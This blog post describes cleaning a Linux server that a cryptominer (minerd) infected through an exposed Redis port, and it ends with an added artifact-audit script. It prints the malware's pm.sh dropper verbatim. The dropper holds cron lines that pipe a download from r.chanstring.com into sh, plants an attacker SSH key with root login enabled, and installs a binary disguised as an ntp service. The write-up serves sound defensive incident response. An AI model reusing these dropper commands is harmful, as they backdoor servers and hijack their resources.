Complete cleanup process after a Linux server is infected with minerd (detailed)
I carelessly installed a Redis service and left its default port open to the whole internet. At first I assumed the server had no public IP; by the time I found out otherwise it was too late for regrets.
One day I noticed the CPU load was unusually high, found a minerd process eating most of the CPU, googled it, and realised I had been hit.
The cleanup process follows.
Step one
1. Immediately stop the Redis service, restrict access to its port, and add password authentication.
2. Following advice found online, delete the two crontab entries:
sudo rm /var/spool/cron/root
sudo rm /var/spool/cron/crontabs/root
3. Know yourself and your enemy and you will win every battle: study the malware's initialisation script, pm.sh.
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/crontabs/root
if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then
  mkdir -p ~/.ssh
  rm -f ~/.ssh/authorized_keys*
  echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFav root" > ~/.ssh/KHK75NEOiq
  echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
  echo "RSAAuthentication yes" >> /etc/ssh/sshd_config
  echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
  echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config
  /etc/init.d/sshd restart
fi
if [ ! -f "/etc/init.d/ntp" ]; then
  if [ ! -f "/etc/systemd/system/ntp.service" ]; then
    mkdir -p /opt
    curl -fsSL http://r.chanstring.com/v51/lady_`uname -m` -o /opt/KHK75NEOiq33 && chmod +x /opt/KHK75NEOiq33 && /opt/KHK75NEOiq33 -Install
  fi
fi
/etc/init.d/ntp start
ps auxf | grep -v grep | grep "/usr/bin/cron" | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep "/opt/cron" | awk '{print $2}' | xargs kill -9
Findings
1. Delete the crontab configuration files. We already did this above; the code involved is:
echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/crontabs/root
2. Delete these two files; they give the attacker passwordless SSH login:
rm -f ~/.ssh/authorized_keys*
rm -f ~/.ssh/KHK75NEOiq
You can even delete the whole .ssh directory.
The code involved:
if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then
  mkdir -p ~/.ssh
  rm -f ~/.ssh/authorized_keys*
  echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFav root" > ~/.ssh/KHK75NEOiq
  echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
  echo "RSAAuthentication yes" >> /etc/ssh/sshd_config
  echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
  echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config
  /etc/init.d/sshd restart
fi
3. Delete the /opt/ directory; its contents were produced by the service described in step 4.
4. Delete the service:
service ntp stop
rm /etc/init.d/ntp
rm /usr/sbin/ntp
The code involved:
if [ ! -f "/etc/init.d/ntp" ]; then
  if [ ! -f "/etc/systemd/system/ntp.service" ]; then
    mkdir -p /opt
    curl -fsSL http://r.chanstring.com/v51/lady_`uname -m` -o /opt/KHK75NEOiq33 && chmod +x /opt/KHK75NEOiq33 && /opt/KHK75NEOiq33 -Install
  fi
fi
The code above downloads an 8 MB program. What it installs I do not know, but the next line gives it away:
/etc/init.d/ntp start
This line starts the "ntp" service. A Baidu search says ntp is a time service, but this one is in fact the malware's service: open the init script, find the executable it runs, /usr/sbin/ntp, and you will see it is byte-for-byte identical to the 8 MB download.
So delete that file.
Finally
ps aux | grep minerd
Kill all of those processes, and the fix is complete.
Half an hour later:
ps aux | grep minerd
The minerd process no longer appears.
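As an added defender's check that is not part of the original post, the following script audits a host (or a mounted copy of its filesystem) for every artifact pm.sh leaves behind: the cron entries, the planted key and sshd_config line, the fake ntp service and its two binaries, and a running minerd. The function name and the optional root-prefix argument are this example's own choices; it only reports and never deletes anything.

```shell
#!/bin/sh
# Audit a host for the persistence artifacts pm.sh drops. ROOT is an optional
# path prefix (empty = the live system; a mount point scans an offline image).
# Prints one line per finding and returns the number of findings (0 = clean).
# Function name and the prefix argument are this example's own choices.
check_minerd_artifacts() {
    root="${1:-}"
    hits=0
    note() { echo "[!] $*"; hits=$((hits + 1)); }

    # 1. the cron entries that re-download the dropper every 10 minutes
    for f in "$root/var/spool/cron/root" "$root/var/spool/cron/crontabs/root"; do
        if [ -f "$f" ] && grep -q 'r.chanstring.com' "$f"; then
            note "dropper cron entry in $f"
        fi
    done

    # 2. the planted SSH key and the sshd_config line that enables it
    if [ -f "$root/root/.ssh/KHK75NEOiq" ]; then
        note "planted key file $root/root/.ssh/KHK75NEOiq"
    fi
    cfg="$root/etc/ssh/sshd_config"
    if [ -f "$cfg" ] && grep -q 'AuthorizedKeysFile .ssh/KHK75NEOiq' "$cfg"; then
        note "sshd_config points at the planted key"
    fi

    # 3. the fake "ntp" service: init script plus the two copies of the binary
    if [ -f "$root/etc/init.d/ntp" ]; then
        note "fake ntp init script $root/etc/init.d/ntp"
    fi
    for b in "$root/opt/KHK75NEOiq33" "$root/usr/sbin/ntp"; do
        if [ -f "$b" ]; then
            note "dropped binary $b"
        fi
    done
    # the post found /usr/sbin/ntp byte-identical to the 8 MB download
    if [ -f "$root/usr/sbin/ntp" ] && [ -f "$root/opt/KHK75NEOiq33" ] \
        && cmp -s "$root/usr/sbin/ntp" "$root/opt/KHK75NEOiq33"; then
        note "/usr/sbin/ntp is identical to /opt/KHK75NEOiq33"
    fi

    # 4. a running miner (only meaningful on the live system)
    if [ -z "$root" ] && ps aux | grep -v grep | grep -q 'minerd'; then
        note "minerd process is running"
    fi
    echo "findings: $hits"
    return "$hits"
}
```

Run it as `check_minerd_artifacts` on the live host, or `check_minerd_artifacts /mnt/image` against a mounted disk image; a non-zero exit status means at least one artifact is still present.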
That is the complete cleanup process after a Linux server is infected with minerd; we hope you keep supporting 毛票票.